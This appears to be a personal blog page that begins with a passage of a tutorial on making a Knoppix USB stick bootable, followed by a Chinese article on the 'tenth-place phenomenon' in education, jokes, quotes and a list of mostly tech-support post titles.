Now we still need the usb modules (that aren't on the miniroot). Mount the compressed KNOPPIX file (insmod cloop file=PATH/KNOPPIX && mount -t iso9660 /dev/cloop /cdrom) and copy the following files under /cdrom/lib/modules/$KERNELVERSION/kernel/drivers/usb/ to /mnt/modules/usb/:
ehci-hcd.o uhci.o usb-ohci.o usb-storage.o usb-uhci.o usbcore.o
Now you're finished modifying miniroot. Umount it and gzip the file again.

Preparing the Memory Stick

Create a fat-partition on your stick and format it with mkfs.vfat
Mount the memory stick
Copy the files from ~/knoppix-usb/bootdisk/ on the memory stick (that should include your modified miniroot.gz)
Copy the other files from your modified knoppix to the memory stick (the most important is KNOPPIX/KNOPPIX)
The layout on your Memory Stick should look like this:

sh-2.05b# ls -lR
.: total 1576
-rw-r--r-- 1 root root 54 Apr 27 12:48 autorun.bat
-rw-r--r-- 1 root root 47 Apr 27 12:48 autorun.inf
-rw-r--r-- 1 root root 180 Apr 27 12:48 boot.msg
-rw-r--r-- 1 root root 1759 Apr 27 12:48 f2
-rw-r--r-- 1 root root 256 Apr 27 12:48 german.kbd
dr-xr--r-- 2 root root 4096 Apr 27 12:48 knoppix
-rw-r--r-- 1 root root 3262 Apr 27 12:48 knoppix.ico
-r--r--r-- 1 root root 7836 Apr 27 12:51 ldlinux.sys
-rw-r--r-- 1 root root 34395 Apr 27 12:48 logo.16
-rw-r--r-- 1 root root 607866 Apr 27 14:03 miniroot.gz
-rw-r--r-- 1 root root 2402 Apr 27 12:48 syslinux.cfg
-rw-r--r-- 1 root root 921602 Apr 27 12:48 vmlinuz
./knoppix: total 50820
-rw-r--r-- 1 root root 2048 Apr 27 12:48 boot.cat
-rw-r--r-- 1 root root 1474560 Apr 27 12:48 boot.img
-rw-r--r-- 1 root root 50553629 Apr 27 04:48 knoppix
-rw-r--r-- 1 root root 27 Apr 27 12:48 mkfloppy.bat
Now you need to get the Memory Stick bootable: umount it and run 'syslinux /dev/sda1' (or /dev/sd?1 depending on your system).

The ugly part: booting

If you're lucky your computer will boot out of the box when you select USB ZIP as a bootdevice. Otherwise read on...

You can try the other USB Boot Options (Floppy, CD-ROM, Harddisk), if still nothing happens you might have to enable USB Keyboard Support in your BIOS (needed on some motherboards with AMI BIOS and a Via chipset, including Epia-m and Shuttle mv42n).
On some broken boards (like my Epia-M...) you need to plug the memory stick in without any power (remove your power plug), otherwise the BIOS might not recognize the memory stick.
If your BIOS boots from the Memory Stick, but you can see only sequences of ones and zeroes, you can try an alternative bootsector from spblinux. As the site is sometimes down you can download the bootsector here(Version 1.01). Just put this one on /dev/sda and try it out (dd if=spb2_mbr.sec of=/dev/sda). Many thanks to Christian Ostheimer for his great work (I didn't believe anymore in booting from USB, but his spblinux made it possible ;-)
You can get my modified Damn Small Linux here (52 MB)

第10名狀元

2005-04-25T01:19:00.000-07:00

第10名狀元
學生時的70分，職場上的100分
文／曾寶璐　研究員／劉承賢
在10倍速競爭的時代，「第1名」，是許多父母對子女的期盼、也是許多人的目標。然而，1989年，大陸小學老師周武提出的「第10名現象」研究，卻顛覆了舊思維：第10名之流的中庸學生，獲得的關愛眼神不多，但壓抑也最少，在人生賽局中，反而容易成為冠軍。當然，置身在耀眼的白小鴨之中，黑小鴨顯得黯然失色，然而，黑小鴨有「黑」的本色與活力，何不讓想法轉個彎，脫離「白」的隊伍、評價與迷思，走出黑小鴨變黑天鵝的尊容與自信。今年是愛因斯坦發表影響全世界的「相對論」一百週年。這位近百年最偉大的科學家，在大學畢業後，當時還沒成名的他曾經回母校找老師，但他老師根本不認得他，還以為，愛因斯坦是一個想借錢而謊稱是他學生的小混混。後來很多人在討論，愛因斯坦可能是小時了了，但中研院院長李遠哲反問：「是愛因斯坦沒有什麼了不起、沒有才華嗎？還是學校的考試，沒有把他的才華考出來？」李遠哲說，愛因斯坦如果拿到考卷，看到第一個問題沒有道理，會好好地分析問題，而沒有回答。結果，拿回考試成績，可能只有二十分；但如果坐下來跟他好好探討一些問題，那可真是了不起。學校成績，顯然看不出，誰能成為本世紀最偉大的科學家。一百年前如此，一百年後的今天依然，在中國大陸的一項小型調查，顯示類似的情況。一九八九年，中國大陸杭州市天長小學老師周武受邀參加一次畢業學生的聚會。當時他暗自吃驚：那些已經擔任副教授、經理的學生，在學校時的成績並不十分出色。相反的，當年那些成績突出的好學生，成就卻平平。這個現象引發周武的好奇，他開始追蹤畢業班學生，經過十年、針對一百五十一位學生的追蹤調查，周武發現，學生的成長是一個動態的過程。在這種動態變化中，小學的好學生隨著年級升高，出現成績名次後移的現象：小學時主科成績在班級前五名，進入中學後名次後移的，占四三％；相反地，小學時排在七到十五名的學生，在進入國中、高中後，名次往前移的比率竟占八一‧二％。「第十名學生」潛力無窮於是周武提出所謂「第十名現象」：第十名左右的小學生，有著難以預想的潛能和創造力，讓他們未來在事業上嶄露頭角，出人頭地。這裡所指的第十名，並非剛剛好第十名的學生，而是指成績中庸的學生。根據周武解釋，這個群體的共同特徵是：他們受老師和父母的關注不那麼多，學習的自主性更強、興趣更廣泛。至於名列前茅的學生因為得到父母、師長過分關注，過分強化學科成績，反而扼抑了潛能和學習自主性。這個研究結果，觸及了基礎教育的癥結：究竟是分數重要，還是學習力重要？經由大陸媒體爭相報導，「第十名現象」引起廣大回響，從省教育單位到學校，從學生、家長到專家……，透過網路不斷轉貼，餘波甚至蕩漾到了台灣。聯電發言人劉啟東三、四年前到大陸出差，被當地同事熱烈討論「第十名現象」，激發探索的興趣。這研究也呼應著他個人的成長，這位曾被全球外資法人票選為「亞太區第一名」的半導體分析師回想自己的歷程，一直以來最好的名次也就是第十名。劉啟東說，他不是不念書，而是不把所有時間都用在念書。讀書時的第十名、職場上的第一名，劉啟東是「第十名現象」的典型代表。不過，周武的調查，在周延度上仍有爭議處。專門研究青少年行為的中研院社會學研究所副研究員吳齊殷認為，畢竟孩子的發展是不斷地變化，嚴謹的方法必須是針對每一個孩子的生命歷程做紀錄，而不是取幾個時間點的學業成績做比較，這過於隨機。儘管如此，「第十名現象」的研究，丟出了兩大觀點：其一，考第一名有用嗎，名次有多大價值？其二，讀書時代學會什麼，才具有永續競爭力？考試，是考人類已解決的問題第一個觀點，李遠哲的看法是：「考試是考不出到底這個人有多大的能耐。考試考的是人類已經解決的問題，別人都已經去做了，老師從來不去考老師不會的事，他怎麼會去考他不會的事呢？」因此，「當你把所有時間放在考試，你一輩子就會被糟蹋掉，」今年三月二日，他在一場對台大學生的演講上「生活在急速轉變的世界裡」，對未來的社會菁英提出警告。考試名次既然價值性不大，究竟什麼才能產生價值？李遠哲說，五十年前，父母親希望孩子進到大學後可以學得一技之長，然後靠一技之長走遍天下，這在過去是行得通。但現在的社會，如果還想可以靠一技之長走遍天下的話，他會說：「時代不一樣了。」在知識經濟時代裡面，很多重複操作的工作都已經被機器人取代了。留給人類做的事情，往往是變化多端或是令人驚訝的事情，這需要擁有能夠適應變化的智慧。他分析自己的歷程，過去累積的很多知識，隨著歲月都慢慢地忘掉，沒有多大用處，但是很有用的是：「自己學東西的習慣，是一輩子享用不盡的。」分析學習力，可以進一步探討人類的學習動機。美國哥倫比亞大學心理系教授Carol Dweck分析，學習動機來自兩種目標：學習目標（learning goal）和表現目標(performance goal)。「學習目標」指的是，打從心裡想要讓自己變得更棒，事情做得更好而產生學習動機；「表現目標」則是指，想讓別人覺得自己很厲害，避免別人覺得自己沒用而學習。屬於「學習目標導向」的人，對自己有興趣的事物充滿學習興趣，他們會選擇有挑戰性的工作，並且主動想辦法解決問題；屬於「表現目標導向」的人，則很在乎別人怎麼看自己，會努力求得好成績。但是這種人如果遇到自己做不來的事，就會拚命逃避，以免因為失敗，被人家瞧不起。動機強，中庸生也能靠續航力得標政大教育系教授吳靜吉解釋，一個孩子會用功拿好成績，最重要的因素就是他學習得很有興趣，很有學習動機。名次也是學習動機的一種，如果學習動機和表現動機都強，這樣的孩子未來的學習力仍能持續；但如果是表現動機強但學習動機弱，這樣的孩子只能拿到當下的第一名，不具有學習續航力。至於學校成績比較中庸的學童，有很多就是屬於學習動機強的學生，因為擁有學習力，即使小時候成績不突出，靠著續航力未來表現越來越好。台北縣新莊國小校長吳順火指出，所謂的學習力來自「先天屬性＋後天屬性＋努力」，先天屬性指的是孩子的性向；後天屬性則需要父母認知到孩子的先天屬性之後，給予引導和支援。可惜的是，吳順火觀察大部分的家長，總是往相反的方向走，他們要求名次、要求名校，以為這樣未來就能成功，「如果後天不引導，甚至打壓，孩子的先天屬性是會消失的！」考試、排名　都是自信殺手擁有耶魯碩士學位的建築設計師黃永洪，從小成績都只求及格。記憶中，除了小學一年級考過第四名之外，後來幾乎對名次不再有記憶。「考試、排名都是在打擊你的自信！」黃永洪非常慶幸自己在澳門求學，不但沒有聯考壓力，反而得到父母、師長的支援，建立他對建築、美感的自信。「我的自信來自一種幸運，」他說，國小時候雖然也曾經因為考不及格被爸爸打小腿肚，但其實他父親也只要求及格就好。中學時候黃永洪每年暑假都跑香港，拿著相機拚命把喜歡的房子拍下來，當時他不知道原來蓋房子可以是一門學問，純粹就是把相片收集起來欣賞。高中的班級壁報比賽，給了黃永洪第一次驗證自己能力的機會。他費盡心思，用柏油、麻繩、金屬做壁報，三年下來為班上拿下九次的冠軍。到今天，他的櫃子裡頭還收藏著一面獎旗——奧華中學一九六五年班際壁報比賽冠軍。黃永洪對藝術的喜愛因為壁報比賽而更加熱烈，他到舊書攤翻閱國外的建築雜誌、上課時候低頭畫著自己的夢想之屋。有一回，荷蘭籍神父看到他上課在畫畫，不但沒有責備他，反而建議他以後念建築系。「建築耶！」那是黃永洪生平第一次聽到這個字architecture，以前他就只知道房子，黃永洪太興奮，他一直以為畫房子只能偷偷摸摸，沒想到竟然有大學可以正大光明畫房子！黃永洪對建築的無窮學習力來自不斷實做（壁報比賽）與師長（神父）的鼓勵，所培養出來的自信心。這連他申請耶魯大學建築研究所被拒，都沒能把他打倒。「我當時簡直發狂！」黃永洪不相信自己沒有錄取，立刻又準備了一本作品集，請英文比較好的弟弟黃永沃幫他寫信給系主任。一個禮拜後耶魯回信，原來是秘書弄錯了，他終於如願踏入耶魯的殿堂。有目標的人，才能管理信心宏碁創辦人、智融集團董事長暨首席顧問施振榮的母親從來不要求他的名次，但他懂得自我設定學習目標並且找到學習方法。施振榮說，每個人都要設定目標，但必須是有挑戰而且達得到的，這樣才能建立起自信。「人生最重要的是管理信心。」他認為，小孩子還不夠成熟的時候，是沒辦法承受太大的挫折的，所以很多事情只要馬馬虎虎就好，重點是抓住一個大原則。例如，「要更好」是施振榮的大原則，所以他經常為自我設定目標，要求自己一定要有進步，但不一定要考一百分。就他觀察，過去成績很好的同學，因為對成績的得失心太重、壓力太大，反而沒有機會去發展人際關係。學習的態度，是求學的基本。父母不該是培養第一名的孩子，而是培養孩子成為學習目標導向的人，這才是給孩子一輩子的禮物。全力拚讀書，會產生排擠效應「人生是長跑，不應該拚命讀書贏了上半場，下半場就沒了持續力。」專研資優教育的師大特殊教育系教授吳武典比喻，第一名的學生如果為了維持第一，把所有的資源都拿來讀書，自然會排擠掉發展人際關係、領導力或是其他興趣的機會。父母以為考第一名就等於能考上好學校，而考上好學校又等於未來能出人頭地，如果一再這樣畫上等號，忘了培養孩子成為有學習目標的人，可能留下遺憾。張文瑜，三十二歲移民美國的家庭主婦，兒子才六歲就開始上滑雪課、潛能開發課。「我很怕他跟我一樣，所以要讓他多學、多玩！」童年時代的張文瑜，是個「第一名學生」，小學四年級已經戴上厚重的眼鏡，國小到高中累積的獎狀塞滿兩大本資料夾。「我的目標很清楚，就是要第一，」問題是張文瑜不算資優，讀書的時間經常是別人的好幾倍，每次都是盡到最、最、最大的努力才拿到第一。同學呼朋引伴出去玩，張文瑜一定是窩在家念書。張文瑜沒有不快樂，因為父母以她為傲，「只有拿第一，他們才會繼續愛我！」大學聯考張文瑜沒有上台大外文，生平第一次讓父母失望。第一次遭受重大挫折，張文瑜幾乎無法承受，她抓狂似的放火燒高中課本，還好父親及時滅火。街坊鄰居耳語：他們家小孩讀書讀瘋了！放火事件讓父母不逼張文瑜重考，但是上大學後她頓然失去目標，不知道為何要讀書，「同學都只希望不要被二一，老師也不要求第一名！」張文瑜不敢讓同學知道自己過去都是第一名，每當大家談論起高中、國中的事情，她都藉故走開。更挫折的是，同學會跳舞、會唱歌，這些卻從來不曾出現在張文瑜的生命中。「過去的已經不可能彌補了！」人生的目標在大學變得越來越不清楚，總是在羨慕別人的情緒中度過。大三上學期張文瑜就嫁為人婦，直接從學校踏入家庭，因為她不認為自己有能力在社會上找到好工作，舉家移民美國更讓她鬆了一大口氣，因為不會再有親戚問起她小時候的輝煌戰果、更不會有碰到同學的尷尬。她現在唯一的希望，就是讓孩子過一種和自己截然不同的童年。耶魯大學心理系教授羅伯．史登堡（Robert J. Sternberg）是美國研究智慧方面的大師，他提出「智慧三元論」——成功智商包括分析能力〈analytical intelligence〉、實務能力〈practical intelligence〉、創造能力〈creative intelligence〉。並認為只重視智力的「成績評量方式」是偏差的，這類評量方式只測量了學生的分析能力，卻沒有分析到實務能力及創造能力。也因此，根據羅伯．史登堡的論點，學業能力只代表「今天」的成功，無法保證未來的成就。激發孩子去「贏未來」現在許多教育制度已經越來越能肯定多元價值，包括體育優秀的學生也能拿縣長獎，吳順火說，德、智、體、群、美五個面向都設縣長獎，彰顯的就是多元價值，不會永遠都是考試最厲害的拿獎。小學的名次也只排到第五名，第六名是進步獎，其他學生都是第七名。這樣的方式讓許多父母、學童喘了一大口氣，中研院社會學研究所副研究員吳齊殷就說，就算孩子是最後一名我也不知道，真是太好了！分數不能代替經歷，文憑不能代替文化和智慧，「絕對不能以小看大，因為孩子成長過程中隨時隨地都有機會！」吳齊殷說，許多成功人物的成長經歷都說明，名次和人才是兩個截然不同的概念，父母應該保護孩子智慧的火花，而不是拚命給壓力。「考試爭第一，是投資現在，教育是要投資未來。」吳武典認為，「第十名現象」的主要意義，是「觀念上的暮鼓晨鐘」——即使不是名列前茅，成績中庸的學生還是有無窮潛力。尤其對於小學生來說，成績真的不能特別反映出什麼，孩子的未來路很長，變數是很大的。正如前教育部長黃榮村所說：「他還在學習，你要他贏什麼？我們要讓他去贏未來！」

2005-01-14T21:07:00.000-08:00

阿拉伯諺語 : 『你若不想做，會找到一個藉口；你若想做，會找到一個方法』

2005-01-14T21:06:00.000-08:00

讀者：請問各位編輯，你們認為誰是古今中外最偉大的運動員？台北xxx同學
---------------------------------------------------------------------
小編：這個問題一向見仁見智，我沒辦法給你確切答案。但是單從記錄上來看，最偉大的運動員是中國人-- 南宋的抗金名將岳飛。他在一天之內一口氣拿了12面金牌。

2005-01-14T21:05:00.000-08:00

你不能決定生命的長度，但你可以控制它的寬度
你不能左右天氣，但你可以改變心情
你不能改變容貌，但你可以展現笑容
你不能控制他人，但你可以掌握自己
你不能預知明天，但你可以利用今天
你不能樣樣勝利，但你可以事事盡力

embedded linux home gateway

2005-01-14T20:52:00.000-08:00

embedded linux home gateway
http://www.gv.com.tw/ceb_class_view.php?id=55

embedded linux pda

2005-01-14T20:50:00.000-08:00

embedded linux pda
http://www.gv.com.tw/ceb_hottech_detail.php?id=11

當你走進很貴的牛排店時

2004-07-15T23:30:00.000-07:00

去年我們班辦了一次班遊....去台東... 一群人到了台東市也不知道有啥好吃的看到一家看起來不錯的牛排館就進去了... 一進去...看到菜單...果然... 看起來蠻有一回事的牛排館...價位也... 但是十幾個人都已經坐定位小姐開始擺餐具了一群人心都涼了...怎麼辦怎麼辦...超級貴的牛排啊... 這時候也不像鄭昌明可以去辦現金卡啊.... 這時候一個同學突然拿起了手機很大聲的說: "喂喂~~我們在XXX店裡啊! 你說什麼? 不是這裡? 靠!" 然後一群十幾個人突然聽懂這同學的用意就趕快跑掉了.....

jauming

Win32.Induc.A

Win32.Induc.A

在 Windows 7 下安裝 Visual C++ 6的方法

sqmdata00.sqm

建立一張簡易的無人值守 Windows XP 安裝光碟

修正skype當機

iphone用4.1固件降級4.2.1現3194錯誤

To fix Duke.Nukem.Forever slow issue:

【轉】 用 vc6.0 創建一個使用 wpcap.dll 的應用程式，遇到的問題

Macbook 裝xp 聲音變小解決

Uninstall Avira Antivir Completely

那是個思考題！題目是這樣的：

賴賴與織織

txt2pdf,etc.

n次方根的計算機

容易想歪的漫畫

msn virii remove

啟動項目:

minidump

BugTrap downloads

ThreatExpert：

hldrrr.exe srosa.sys bagle

Submission Summary:

Downloaded File Summary:

Technical Details:

new eink reader

reader

http://reader.txtr.com/specifications.html

Technical specifications

Main features

Power

Memory

Communication

使用低階方式存取各類型端口 for XP (inpout32.dll)

linux mm drop caches

2440 dma

cleanMem

cleanMem

Syntax

Parameters

Return Value

deltree in xp

網購騙徒大挪移 買家賣家都被削

kkrunchy esp定律

LNK_EVIDAD.A

ad da

delete drive letter(unmount)(xp)

fix progress calculation in ProgressWnd.cpp:

COleDispatchDriver/_variant_t

Foxit eSlick

Foxit eSlick要你隨身讀

USP10.dll病毒詳解與查殺攻略

Murder In A Wheel - Walkthrough

修正midi 不能播放

免費螢幕畫筆工具(簡報用)

ZoomIt v3.01

By Mark Russinovich

Pioneer DJS 1.601 電腦專用的全音階DJ播放工具

軟體虛擬化:

復原 Windows MBR 的各種方式

復原 Windows MBR 的各種方式

免費磁碟加密:

Debut Video Capture Software 免費畫面錄影

[WinXP] 無法"切換使用者"解法

開啟windows7 media player的音樂視覺效果:

[Word技巧] 簡簡單單讓Word自動「生」出目錄 - 一般目錄篇

[開補習班一定很賺]

2007 的101 煙火

MSN can not login. Error code: 81000314 or 80072745MSN 遇到錯誤碼 81000314 或 80072745 無法登入?

MSN無法登入之錯誤碼辨別大全

RMVB 網站廣告移除方法:

msn space 照片無法上傳解決方法:

colorbar

os fingerprint

直接將 WMA、MP3、OGG 燒錄成音樂 CD

女保險員詐保費落跑 中縣市數十保戶被騙損失千萬

小女子玩高招各匯1元毀詐騙集團4人頭戶

vdsp ldf out of memory fix:

瓦斯費新制 劫貧濟富

【轉】用 vc6.0 創建一個使用 wpcap.dll 的應用程式，遇到的問題

網購騙徒大挪移買家賣家都被削

女保險員詐保費落跑　中縣市數十保戶被騙損失千萬

瓦斯費新制劫貧濟富

怕老婆的站左邊　　不怕老婆的站右邊

吸金四十億害三萬人全面搜捕阜東集團【2006/3/8】

(真實故事系列2之：蛋餅加蛋篇)